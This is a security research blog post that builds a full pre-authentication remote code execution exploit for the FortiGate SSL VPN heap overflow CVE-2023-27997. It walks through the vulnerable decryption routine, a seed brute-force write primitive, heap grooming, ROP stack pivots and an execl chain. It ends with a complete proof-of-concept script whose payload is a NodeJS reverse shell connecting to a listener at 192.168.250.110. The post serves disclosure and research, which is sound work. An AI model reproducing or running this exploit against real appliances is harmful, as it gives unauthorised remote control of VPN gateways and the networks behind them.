Building an Exploit for FortiGate Vulnerability CVE-2023-27997

By: Bishop Fox Researchers, Security Researchers

Background

Earlier this year, Lexfo published details of a pre-authentication remote code injection vulnerability in the Fortinet SSL VPN. Shortly thereafter, we published a vulnerability scanner and an analysis of vulnerable systems on the internet along with a proof-of-concept demo. This blog post will describe how we built that proof-of-concept exploit, step by step.

Our exploit follows the steps described in Lexfo’s original writeup of the vulnerability. This writeup was extremely helpful when building our exploit, and it includes a lot more detail on the vulnerability.

Test Environment

Our debugging environment consisted of a FortiGate 7.2.4 virtual machine which we modified to disable some self-verification functionality. After bypassing these integrity checks, we were able to install an SSH server, BusyBox, and debugging tools such as GDB.

The Vulnerability

The bug is a heap-based buffer overflow, due to an incorrect size check when decoding a URL parameter in the /remote/hostcheck_validate and /remote/logincheck endpoints. These endpoints take a hex-encoded string in the enc GET parameter with the following format:

FIGURE 1 - enc parameter format (source)

The seed field is combined with a “salt” and the static string “GCC is the GNU Compiler Collection” to form a key. The salt is derived from the time at which sslpnd was started and can be obtained with a GET request to /remote/info. Encryption is performed with a custom stream cipher built from MD5. The following Python3 code generates size bytes of keystream, which is then XOR'd with the plaintext data to generate the ciphertext:

from hashlib import md5
def gen_ks(salt, seed, size):
    magic=b'GCC is the GNU Compiler Collection.'
    k0=md5(salt+seed+magic).digest()
    keystream=k0
    while len(keystream)<size:
        k0=md5(k0).digest()
        keystream+=k0
    return keystream[:size]

The application will call fsv_malloc to allocate a buffer of size strlen(enc_parameter) / 2 + 1, and hex-decode the data into this buffer. It will then decrypt the length field and attempt to perform a bounds check. Unfortunately, this check is implemented incorrectly, and the length field is compared to the previously computed length of the hex-encoded enc parameter rather than the length of the allocated buffer. As a result, we can “decrypt” memory out-of-bounds of the buffer.

Heap Allocator

FortiOS uses jemalloc as its main allocator. Compared to GNU libc malloc implementation, jemalloc is much more predictable and does not implement countermeasures against heap exploitation. As noted by Lexfo:

Allocations are contiguous, without any heap metadata between chunks
Freelists for chunks of a given size range are implemented with a LIFO mechanism, so we can reliably reclaim chunks

Like many other allocators, jemalloc uses different freelists for different chunk sizes. It can be helpful to keep these chunk sizes in mind when crafting allocations. The documentation includes a table of these size classes for 64-bit systems.

FIGURE 2 - Table of size classes and spacings for small chunks

Our First Crash

With the initial theory in mind, let’s see if we can cause a crash.

We first define some helper functions to generate the encrypted data given a salt, seed, size field, and data.

def gen_ks(salt, seed, size):
    magic=b'GCC is the GNU Compiler Collection.'
    k0=md5(salt+seed+magic).digest()
    ks=k0
    while len(ks)<size:
        k0=md5(k0).digest()
        ks+=k0
    return ks[:size]
 
def gen_enc_data(salt, seed, size, data):
    plaintext=struct.pack("<H", size) + data
    keystream = gen_ks(salt, seed, len(plaintext))
    ciphertext = bytes(x[0]^x[1] for x in zip(plaintext, keystream)).hex()
    return seed.decode()+ciphertext

Next, we grab the salt from the remote server:

r=requests.get(BASEURL+"/remote/info", verify=False)
salt=r.content.split(b"salt='")[1].split(b"'")[0]
print("salt: "+salt.decode())

Using this salt, we generate the enc parameter. To trigger a 0x1000-byte allocation, we send 0x1000-4-2-1 bytes of data, accounting for the size of the seed and length fields as well as the extra byte that gets added by sslvpnd for the null terminator. Then, we set the length field to just under 0x2000 to trigger the bug.

payload='enc='+gen_enc_data(salt, b'00bfbfbf', 0x1f00, b'A'*(0x1000-4-2-1))
try:
    r=requests.post(BASEURL+'/remote/hostcheck_validate', headers={'content-type':'application/x-www-form-urlencoded'}, verify=False, data=payload)
except requests.exceptions.ConnectionError: 
    print('Crashed!')

We run this and... nothing happens. We get an error reply from the server, but no crash. What gives?

As it turns out, the answer is simple: the fsv_malloc function which allocates the response buffer adds 0x18 bytes of header information before calling jemalloc to allocate the actual data buffer. Changing the size of the data field to 0x1000-0x18-7 and re-running reliably results in a crash:

$ python3 crash.py
Salt: 749a2b77
Crashed!

Out of Bounds Write Primitive

The next step is to turn our crash into an out-of-bounds write primitive. The technique described by Lexfo is very powerful, and we were able to reproduce it without any issues.

We start by brute forcing a seed value which results in a keystream containing the target byte at the correct offset.

def gen_seed_for_offset(salt, offset, value):
    for i in range(0xffffff):
        seed="00{0:06x}".format(i).encode()
        ks=gen_ks(salt, seed, offset+1)
        if int(ks[offset])==int(value):
            return seed    
    print("keystream search failed")
    return None

Next, we send two requests with the same seed. The first request will have a length field that causes sslvpnd to write the null terminator to the target byte. The second request will have a length field which is one byte larger, resulting in the target byte being “decrypted”. Since encryption uses XOR, and we have just set the target byte to 0, this results in writing a chosen value to the target offset. This will clobber the byte after the target value, but as you will see later, this isn’t an issue in practice. As an optimization, we can write a null byte by sending the same request twice, which means we can skip the brute force step.

def gen_seeds_u8(salt, offset, val):
    value=struct.pack("<B", val)
    if val==0:
        return [(b'00bfbfbf', offset-1), (b'00bfbfbf', offset-1)]
    s = gen_seed_for_offset(salt, offset, value[0])
    return [(s,offset-2),(s,offset-1)]

We know that we will want to write pointer values later, so we also make a helper function to generate seeds for pointers. For these values, we will start with the last byte of the 64-bit value and work backwards to avoid clobbering later data with the null byte that gets written by sslvpnd. Next, we can use the same optimization of skipping the brute force when writing null bytes. Additionally, on x86-64, user mode addresses start with two null bytes. This means we are never at risk of clobbering important data when we write a pointer to memory.

def gen_seeds_u64(salt, offset, val):
    value=struct.pack("<Q", val)
    seeds=[]
    n=7
    for i in range(n,-1,-1):
        if value[i]!=0:
            s=gen_seed_for_offset(salt, offset+i, value[i])
            seeds.append((s, offset+i-1))
            seeds.append((s, offset+i-2))
        else:
            # save some time by skipping the brute force. the application will write a null terminator to buf[size]
            seeds.append((b'00bfbfbf', offset+i-1))
            seeds.append((b'00bfbfbf', offset+i-1))
    return seeds[::-1]

Heap Grooming

Our goal is to overwrite a callback in an SSL struct. This means we will have to be able to reliably and repeatedly allocate our payload immediately before an SSL struct. Again, we follow Lexfo’s methodology of using a socket, which triggers allocations of a request buffer and an SSL structure in the same heap region, and then attempting to de-allocate the request buffer and allocate a new request buffer in its place. On our 64-bit system running version 7.2.4, the SSL struct has a size of 0x1db8 and is therefore allocated in the 0x2000 byte region. On older systems, we observed the SSL structure was 0x1850, and therefore allocated in the 0x1c00 region. Most of this writeup will assume a size of 0x2000.

To track down sources of allocations and deallocations, we made a GDB script that would print out useful debugging information while we made requests:

set height 0
set pagination off
set disassembly-flavor intel
handle SIGPIPE nostop
# break after allocating the buffer grab the address
b *0x0173164e
commands
    silent
    set $heap_obj = $rax
    printf "buffer: %p\n", $heap_obj
    c
end
# print address of SSL objects when malloc'd
b *CRYPTO_zalloc+37 if  ( $r12 == 0x1db8 )
commands
    silent
    printf "CRYPTO_zalloc(0x%x) = %p\n", $r12, $rax
    c
end

# break in malloc helper function (used by vulnerable function)
b *0x018021d6 if (($r13>0x1c00) && ($r13<=0x2000))
commands
    silent
    set $size = $r13
    set $addr = $rax
    printf "malloc(0x%x) = %p\n", $size, $addr
    c
end

# break in je_malloc in case something calls je_malloc directly
b *je_malloc if (($rdi>0x1c00) && ($rdi <=0x2000))
commands
    silent
    printf "je_malloc(%x)\n", $rdi
    c
end

The exact addresses and registers that we use in this script were identified through static analysis and will need to be changed for each version you test. Using this script, we were able to minimize noise due to extraneous allocations, and reliably obtain the heap layout we want. This boils down to a few steps:

Create a requests.Session and issue a request to establish the TLS connection
Create a bunch of sockets to fill in holes on the heap
Send a very long message on one of the sockets, causing its data buffer to be freed and re-allocated elsewhere
Send multiple requests (using the Session established in step one) which each cause a 0x2000 byte allocation, and use them to overwrite the SSL struct

Step one is easy. We create a session with sess=requests.Session(), and replace our requests.get()/post() with sess.get()/post(). This will avoid repeatedly deallocating and reallocating the SSL object associated with our connection, resulting in much less noise on the heap.

Step two and three are also easy:

import ssl
# Disable SSL verification
context = ssl.SSLContext()
context.verify_mode=ssl.CERT_NONE

ssocks=[]
# Create one SSL socket and save it in the global ssocks list
def create_ssl_conn():
    s=socket.create_connection(HOST, timeout=None)
    ss=context.wrap_socket(s)
    ssocks.append(ss)

for i in range(20): 
    create_ssl_conn()
# Pick one SSL socket and force its data buffer to be reallocated
ssocks[-2].send(b’A’*0x2001)

Step four is something we have already done: send requests to “decrypt” out-of-bounds data. We will use our helper functions from earlier to create a list of seeds and length fields. We will then iterate through this list and send a request with the size and seed set correctly, and the data field will be 0x2000-0x18-7 bytes long, so we trigger a 0x2000 byte allocation.

One last note about the data field is that the plaintext must have a null byte before the first & or =. Otherwise, more allocations may occur. We work around this by simply starting our data with a few nulls.

RIP Control

Now that we have tamed the heap, we can work on the last few steps of achieving RCE. Right now, the hex-decoded data buffer is located 0x2000-0x18 bytes before the SSL structure. The first 4 bytes of this are the plaintext salt, followed by the encrypted size field and data payload. This means that when calculating offsets for our seed generation, the first byte of the SSL structure is at offset 0x2000-0x18-4. We know from Lexfo’s writeup that we will want to overwrite the handshake_func callback, which is at offset 0x30 within this structure. We also know from Orange Tsai’s writeup of CVE-2018-13383 that OpenSSL calls SSL_in_init before calling handshake_func. SSL_in_init checks the in_init field in our SSL structure, which will be false for established connections. Let’s overwrite these fields and see what happens.

In our exploit script, we add:

seeds=[]
seeds.extend(gen_seeds_u64(salt, handshake_func, 0x4141414141414141))
seeds.extend(gen_seeds_u8(salt, in_init, 1))
for i in seeds:
    print((i[0], hex(i[1]-ssl_offset)))
    make_req(sess, salt, i[0], i[1], b'\0'*8 + b'A'*(0x2000-0x18-7-8))

And when we observe the results in GDB, we see:

(gdb) c
Continuing.
CRYPTO_zalloc(0x1db8) = 0x7f6e3ead9000
CRYPTO_zalloc(0x1db8) = 0x7f6e3eb1e000
CRYPTO_zalloc(0x1db8) = 0x7f6e3eb2a000
CRYPTO_zalloc(0x1db8) = 0x7f6e3eb2e000
CRYPTO_zalloc(0x1db8) = 0x7f6e3eb3f000
CRYPTO_zalloc(0x1db8) = 0x7f6e3eb43000
CRYPTO_zalloc(0x1db8) = 0x7f6e3eb47000
CRYPTO_zalloc(0x1db8) = 0x7f6e3eb51000
CRYPTO_zalloc(0x1db8) = 0x7f6e3eb55000
CRYPTO_zalloc(0x1db8) = 0x7f6e3eb59000
CRYPTO_zalloc(0x1db8) = 0x7f6e3eb5d000
CRYPTO_zalloc(0x1db8) = 0x7f6e3eb61000
CRYPTO_zalloc(0x1db8) = 0x7f6e3eb16000
CRYPTO_zalloc(0x1db8) = 0x7f6e3eb6e000
CRYPTO_zalloc(0x1db8) = 0x7f6e3eb72000
CRYPTO_zalloc(0x1db8) = 0x7f6e3eb76000
CRYPTO_zalloc(0x1db8) = 0x7f6e3eb7a000
CRYPTO_zalloc(0x1db8) = 0x7f6e3eb84000
CRYPTO_zalloc(0x1db8) = 0x7f6e3eb88000
CRYPTO_zalloc(0x1db8) = 0x7f6e3eb8c000
CRYPTO_zalloc(0x1db8) = 0x7f6e3eb90000
CRYPTO_zalloc(0x1db8) = 0x7f6e3eb94000
CRYPTO_zalloc(0x1db8) = 0x7f6e3ebbc000
CRYPTO_zalloc(0x1db8) = 0x7f6e3ebc0000
CRYPTO_zalloc(0x1db8) = 0x7f6e3ebc4000
malloc(0x2000) = 0x7f6e3ebbe000
buffer: 0x7f6e3ebbe018
malloc(0x2000) = 0x7f6e3ebbe000
buffer: 0x7f6e3ebbe018
malloc(0x2000) = 0x7f6e3ebbe000
buffer: 0x7f6e3ebbe018
malloc(0x2000) = 0x7f6e3ebbe000
buffer: 0x7f6e3ebbe018
malloc(0x2000) = 0x7f6e3ebbe000
buffer: 0x7f6e3ebbe018
malloc(0x2000) = 0x7f6e3ebbe000
buffer: 0x7f6e3ebbe018
malloc(0x2000) = 0x7f6e3ebbe000
buffer: 0x7f6e3ebbe018
malloc(0x2000) = 0x7f6e3ebbe000
buffer: 0x7f6e3ebbe018
malloc(0x2000) = 0x7f6e3ebbe000
buffer: 0x7f6e3ebbe018
malloc(0x2000) = 0x7f6e3ebbe000
buffer: 0x7f6e3ebbe018
malloc(0x2000) = 0x7f6e3ebbe000
buffer: 0x7f6e3ebbe018
malloc(0x2000) = 0x7f6e3ebbe000
buffer: 0x7f6e3ebbe018
malloc(0x2000) = 0x7f6e3ebbe000
buffer: 0x7f6e3ebbe018
malloc(0x2000) = 0x7f6e3ebbe000
buffer: 0x7f6e3ebbe018
malloc(0x2000) = 0x7f6e3ebbe000
buffer: 0x7f6e3ebbe018
malloc(0x2000) = 0x7f6e3ebbe000
buffer: 0x7f6e3ebbe018
malloc(0x2000) = 0x7f6e3ebbe000
buffer: 0x7f6e3ebbe018
malloc(0x2000) = 0x7f6e3ebbe000
buffer: 0x7f6e3ebbe018
 
Program received signal SIGSEGV, Segmentation fault.
0x00007f6e43f2fe1b in ?? () from /usr/lib/x86_64-linux-gnu/libssl.so.3
(gdb) x/i $rip
=> 0x7f6e43f2fe1b:      call   QWORD PTR [rbp+0x30]
(gdb) x/gx $rbp+0x30
0x7f6e3ebc0030: 0x4141414141414141
(gdb)

As expected, the program crashes when trying to jump to 0x4141414141414141! Only a few more steps now.

Stack Pivot

The heap, where our data is located, is not mapped as executable. This means we won’t be able to send some shellcode and jump to it. We can easily make a ROP chain since the process doesn’t use ASLR, but since we don’t control data on the stack, the first gadget on the ROP chain will return to an address that we can’t control. This means we will have to find a way to point the stack pointer at something we can control. Looking at registers, we saw that both RDI and RBP point to the SSL structure that we can overwrite.

Using ropr, we find a push rdi; pop rsp; ret gadget at address 0xfd0582. Using this, we can place a second gadget at the start of the SSL structure and let it run. Unfortunately, the field after this is method, which is a pointer to a function table that we can’t safely overwrite without causing a crash. This means we must use another stack pivot gadget to adjust the stack pointer again. Since the stack pointer is already pointing close to our data, we attempt to find a gadget which would subtract a small value from RSP, causing it to point into our data buffer. Unfortunately, we can’t find a good gadget and settle for an add rsp, 0x270; pop rbx; pop r12; pop rbp; ret; gadget instead. That means, after the second stage of our ROP gadget, we are pointing the stack at SSL+0x290. Luckily, we finally have enough room to fit a longer ROP payload here.

In the last stage of our pivot gadget, RDI is still pointing at our SSL structure. We found a sub rdi, 0x100 gadget at 0x1afd214, and then follow this with the original push rdi; pop rsp; gadget to finally point our stack into the data buffer which we control. We could have alternatively used the write primitive to insert our entire ROP chain into the SSL structure, but that would require brute forcing more seeds and sending more requests, which would slow down the exploit significantly.

The three-stage pivot setup looks like this:

# set rsp = *SSL
PIVOT_1=0x00fd0582 # push rdi; pop rsp; ret
# rsp=*SSL+0x290
PIVOT_2=0x008ecb49 # add rsp, 0x270; pop rbx; pop r12; pop rbp; ret;
# rsp = *SSL-0x100
PIVOT_3=0x01afd214 # sub rdi, 0x100; test rax, rax; cmove rax, rdi; ret;
 
seeds=[]
seeds.extend(gen_seeds_u64(salt, ssl_offset+0x30,  PIVOT_1))
seeds.extend(gen_seeds_u64(salt, ssl_offset+0x00,  PIVOT_2))
seeds.extend(gen_seeds_u64(salt, ssl_offset+0x290, PIVOT_3))
seeds.extend(gen_seeds_u64(salt, ssl_offset+0x298, PIVOT_1))
seeds.extend(gen_seeds_u8(salt, in_init, 1))

And running that results in:

(gdb) c
Continuing.
 
Program received signal SIGSEGV, Segmentation fault.
0x0000000000fd0584 in ?? ()
(gdb) i r rdi rsp
rdi            0x7f6e3ebbff00      0x7f6e3ebbff00
rsp            0x7f6e3ebbff00      0x7f6e3ebbff00
(gdb) x/8gx $rsp
0x7f6e3ebbff00: 0x4141414141414141      0x4141414141414141
0x7f6e3ebbff10: 0x4141414141414141      0x4141414141414141
0x7f6e3ebbff20: 0x4141414141414141      0x4141414141414141
0x7f6e3ebbff30: 0x4141414141414141      0x4141414141414141
(gdb) x/8gx $rsi+0x100
0x7f6e3ebc0000: 0x00000000008ecb49      0x00007f6e43f7f700
0x7f6e3ebc0010: 0x00007f6e3eacc660      0x00007f6e3eacc660
0x7f6e3ebc0020: 0x0000000000000000      0x0000000000000001
0x7f6e3ebc0030: 0x0000000000fd0582      0x0000000000000000
(gdb)

As expected, our stack points to 0x100 bytes from the end of our data buffer, or 0x100 bytes before the start of the SSL structure. This gives us plenty of room to fit a ROP chain in our buffer.

`ROP Chain`

Although it would be nice to simply call system('<commands>'), FortiOS uses a custom binary for /bin/sh which restricts what commands you can run. As a result, trying to run anything useful using system() or popen() will fail. Instead of using one of these convenient wrappers, we will construct a slightly less convenient ROP chain which calls execl. As a proof-of-concept, we will run execl('/bin/node', '/bin/node', '-e', '<node payload>', NULL).

The actual Node payload will be a slightly modified version of the NodeJS reverse shell we found in the PayloadAllTheThings GitHub repository. Specifically, instead of running /bin/sh, we run /bin/node and pass in the -i argument for an interactive prompt. We also modify the connect-back IP to suit our test environment.

shell=b"""(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/node", ["-i"]);
    var client = new net.Socket();
    client.connect(4242, "192.168.250.110", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application from crashing
})();
"""

Since we have plenty of space for our ROP chain, we don’t try to optimize it too much. The simplified, pseudo-assembly version of our ROP chain is below.

mov rax, rdi ; rax = SSL-0x100
mov rcx, ~(0x1000-1)
and rax, rcx
mov rcx, rax ; rcx = SSL-0x1000
 
mov [scratch_buffer+0], "/bin/nod"
mov [scratch_buffer+8], "e\0-e\0\0\0\0"
 
mov rdi, &scratch_buffer    ; "/bin/node
mov rsi, &scratch_buffer    ; "/bin/node"
mov rdx, &scratch_buffer+10 ; "-e\0"
mov r8, 0                   ; NULL
 
jmp execl ; execl("/bin/node", "/bin/node", "-e", payload, NULL);

Because of how jemalloc allocates memory, we know that our allocated buffer will be aligned to 0x2000 bytes. We also know that the rdi is a pointer to our ROP chain, since that’s the register we used to jump to our ROP chain in the first place. By masking out the bottom few bits, we point <font face="SFMono-Regular, Consolas, Liberation Mono, Menlo, Courier, monospace">rcx</font> into the middle of our buffer, which gives us plenty of room to add NodeJS code to do whatever we want. As for the other arguments, we decide to pick a fixed address that is readable and writable to use as a scratch buffer. We can then use a simple group of gadgets to write /bin/node\0-e\0\0\0\0 to that buffer. From there, we pop hardcoded values into rdi, rsi, rdx, and r8. Once that’s done, we jump to execl and our payload runs.

def pad(d, n, c=b'\0'):
    return d+c*(n-len(d))
def u64(x):
    return struct.pack("<Q", x)
def make_ropchain():
    scratch=b'/bin/node\0-e\0\0\0\0'
    scratch_vals=struct.unpack("<2Q", scratch)
    scratch_addr=0x04825000
    argv_1=scratch_addr+scratch.index(b"-e\0")
 
    rop =b''
    # 1. point rcx to offset 0x1000 within our data buffer, where we have our JS payload
    rop+=u64(0x02b228a0)       # mov rax, rdi; ret;
    rop+=u64(0x00b15381)       # pop rcx; ret
    rop+=u64(0xfffffffffffff000)
    rop+=u64(0x02c85e40)       # and rax, rcx; ret;
    rop+=u64(0x00b15381)       # pop rcx; ret
    rop+=u64(0)                # <rcx = 0>
    rop+=u64(0x02166fa9)       # or rcx, rax; ...; ret;
 
    # 2. write "/bin/node\0-e\0" to a scratch buffer
    rop+=u64(0x02c87265)       # pop rax; ret;
    rop+=u64(scratch_vals[0])  # "/bin/nod"
    rop+=u64(0x02ca1f52)       # pop rsi; ret;
    rop+=u64(scratch_addr)     # <scratch buffer>
    rop+=u64(0x029e36dd)       # mov [rsi], rax; ret
 
    rop+=u64(0x02c87265)       # pop rax; ret;
    rop+=u64(scratch_vals[1])  # "e\0-e\0\0\0\0"
    rop+=u64(0x02ca1f52)       # pop rsi; ret;
    rop+=u64(scratch_addr+8)   # <scratch buffer>
    rop+=u64(0x029e36dd)       # mov [rsi], rax; ret
 
    # setup arguments for execl
    rop+=u64(0x02ca0763)       # pop rdi; ret;
    rop+=u64(scratch_addr)     # "/bin/node"
    rop+=u64(0x02ca1f52)       # pop rsi; ret;
    rop+=u64(scratch_addr)     # "/bin/node"
    rop+=u64(0x02b76f39)       # pop rdx
    rop+=u64(argv_1)           # "-e"
    rop+=u64(0x0289a815)       # REX.WRXB pop r8
    rop+=u64(0)
    # rcx already points to the last argument
 
    # 3. call execl("/bin/node", "/bin/node", "-e", "<command>", NULL);
    rop+=u64(0x0043b170)       # execl@PLT
    # pad to size
    assert len(rop) < 0x100
    return rop

We construct the data buffer to place our JS payload at 0x1000 within the chunk, and the ROP chain at 0x1f00 within the chunk.

payload_size=0x2000-0x18-7
payload =(b'\0'*8) + (b'A'*(0x1000-0x18-8-6))
payload+=pad(shell, 0x1000-0x100)
payload+=make_ropchain()
payload =pad(payload, payload_size)

And modify our code to send this payload instead of the A’s we were sending before:

for i in seeds:
    make_req(sess, salt, i[0], i[1], payload)

Finally, it’s time to start a netcat listener and catch a shell:

FIGURE 3 - Running the exploit and seeing our Node reverse shell

Full Proof of Concept

import requests, struct, ssl, socket, socket
from hashlib import md5
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

context = ssl.SSLContext()
context.verify_mode=ssl.CERT_NONE
context.options|=ssl.OP_NO_TLSv1_3

HOST=("192.168.250.124",12443)
BASEURL="https://{}:{}".format(*HOST)

ssocks=[]
def create_ssl_conn():
    s=socket.create_connection(HOST, timeout=None)
    ss=context.wrap_socket(s)
    ssocks.append(ss)

def gen_ks(salt, seed, size):
    magic=b'GCC is the GNU Compiler Collection.'
    k0=md5(salt+seed+magic).digest()
    ks=k0
    while len(ks)<size:
        k0=md5(k0).digest()
        ks+=k0
    return ks[:size]

def gen_enc_data(salt, seed, size, data):
    plaintext=struct.pack("<H", size) + data
    keystream = gen_ks(salt, seed, len(plaintext))
    ciphertext = bytes(x[0]^x[1] for x in zip(plaintext, keystream)).hex()
    return seed.decode()+ciphertext

def make_req(sess, salt, seed, reqsize, data=b''):
    payload=gen_enc_data(salt, seed, reqsize, data)
    payload="enc="+payload</p>
    r=sess.post(BASEURL+"/remote/hostcheck_validate", headers={"content-type":"application/x-www-form-urlencoded"}, verify=False, data=payload)
    return r

def gen_seed_for_offset(salt, offset, value, incl_ks=False):
    for i in range(0xffffff):
        seed="00{0:06x}".format(i).encode()
        ks=gen_ks(salt, seed, offset+1)
        if int(ks[offset])==int(value):
            if incl_ks: return seed, ks[:offset+1]
            else: return seed
    else:
        print("keystream search failed")
        return

def gen_seeds_u8(salt, offset, val):
    value=struct.pack("<B", val)
    if val==0:
        return [(b'00bfbfbf', offset-1), (b'00bfbfbf', offset-1)]
    s = gen_seed_for_offset(salt, offset, value[0])
    return [(s,offset-2),(s,offset-1)]

def gen_seeds_u64(salt, offset, val):
    value=struct.pack("<Q", val)
    seeds=[]
    n=7
    for i in range(n,-1,-1):
        if value[i]!=0:
            s=gen_seed_for_offset(salt, offset+i, value[i])
            seeds.append((s, offset+i-1))
            seeds.append((s, offset+i-2))
        else:
            seeds.append((b'00bfbfbf', offset+i-1))
            seeds.append((b'00bfbfbf', offset+i-1))
    return seeds[::-1]


def pad(d, n, c=b'\0'):
    return d+c*(n-len(d))
def u64(x):
    return struct.pack("<Q", x)
def make_ropchain():
    scratch=b'/bin/node\0-e\0\0\0\0'
    scratch_vals=struct.unpack("<2Q", scratch)
    scratch_addr=0x04825000
    argv_1=scratch_addr+scratch.index(b"-e\0")

    rop =b''
    # 1. point rcx to offset 0x1000 within our data buffer, where we have our JS payload
    rop+=u64(0x02b228a0)       # mov rax, rdi; ret;
    rop+=u64(0x00b15381)       # pop rcx; ret
    rop+=u64(0xfffffffffffff000)
    rop+=u64(0x02c85e40)       # and rax, rcx; ret;
    rop+=u64(0x00b15381)       # pop rcx; ret
    rop+=u64(0)                # <rcx = 0>
    rop+=u64(0x02166fa9)       # or rcx, rax; ...; ret;

    # 2. write "/bin/node\0-e\0" to a scratch buffer
    rop+=u64(0x02c87265)       # pop rax; ret;
    rop+=u64(scratch_vals[0])  # "/bin/nod"
    rop+=u64(0x02ca1f52)       # pop rsi; ret;
    rop+=u64(scratch_addr)     # <scratch buffer>
    rop+=u64(0x029e36dd)       # mov [rsi], rax; ret

    rop+=u64(0x02c87265)       # pop rax; ret;
    rop+=u64(scratch_vals[1])  # "e\0-e\0\0\0\0"
    rop+=u64(0x02ca1f52)       # pop rsi; ret;
    rop+=u64(scratch_addr+8)   # <scratch buffer>
    rop+=u64(0x029e36dd)       # mov [rsi], rax; ret

    # setup arguments for execl
    rop+=u64(0x02ca0763)       # pop rdi; ret;
    rop+=u64(scratch_addr)     # "/bin/node"
    rop+=u64(0x02ca1f52)       # pop rsi; ret;
    rop+=u64(scratch_addr)     # "/bin/node"
    rop+=u64(0x02b76f39)       # pop rdx
    rop+=u64(argv_1)           # "-e"
    rop+=u64(0x0289a815)       # REX.WRXB pop r8
    rop+=u64(0)
    # rcx already points to the last argument

    # 3. call execl("/bin/node", "/bin/node", "-e", "<command>", NULL);
    rop+=u64(0x0043b170)       # execl@PLT
    # pad to size
    assert len(rop) < 0x100-1
    return rop

shell=b"""(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/node", ["-i"]);
    var client = new net.Socket();
    client.connect(4242, "192.168.250.110", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application from crashing
})();
"""

payload_size=0x2000-0x18-7
payload =(b'\0'*8) + (b'A'*(0x1000-0x18-8-6))
payload+=pad(shell, 0x1000-0x100)
payload+=make_ropchain()
payload =pad(payload, payload_size)


sess=requests.Session()
r=sess.get(BASEURL+"/remote/info", verify=False)
salt=r.content.split(b"salt='")[1].split(b"'")[0]
print("salt: "+salt.decode())
ssl_offset=0x2000-0x18-4
handshake_func=ssl_offset + 0x30
in_init = ssl_offset+0x64


# set rsp = *SSL
PIVOT_1=0x00fd0582 # push rdi; pop rsp; ret
# rsp=*SSL+0x290
PIVOT_2=0x008ecb49 # add rsp, 0x270; pop rbx; pop r12; pop rbp; ret;
# rsp = *SSL-0x100
PIVOT_3=0x01afd214 # sub rdi, 0x100; test rax, rax; cmove rax, rdi; ret;


seeds=[]
seeds.extend(gen_seeds_u64(salt, ssl_offset+0x30,  PIVOT_1))
seeds.extend(gen_seeds_u64(salt, ssl_offset+0x00,  PIVOT_2))
seeds.extend(gen_seeds_u64(salt, ssl_offset+0x290, PIVOT_3))
seeds.extend(gen_seeds_u64(salt, ssl_offset+0x298, PIVOT_1))
seeds.extend(gen_seeds_u8(salt, in_init, 1))

for i in range(24):
    create_ssl_conn()
ssocks[-2].send(b'A'*0x2001)

for i in seeds:
    make_req(sess, salt, i[0], i[1], payload)

Conclusion

This vulnerability is yet another which would not have been nearly as impactful if basic exploit mitigations (ASLR in this case) were implemented. This is a pattern we have observed across most major network appliances, and we hope that the prevalence of memory corruption vulnerabilities results in a push to implement these mitigations. We had a lot of fun developing this exploit, and we would once again like to thank Lexfo for their helpful blog post which laid out a very clear roadmap of how to exploit this vulnerability. We look forward to continuing to share our research on network appliance vulnerabilities in the future.

Subscribe to our blog and advisories

Be first to learn about latest tools, advisories, and findings.

Scoring high in the GigaOm Radar for the fourth year in a row!

See Why We're the Leaders in Offensive Security

The State of Offensive Security

The Best Defense is a Great Offense

Want to Work with the Best Minds in Offensive Security?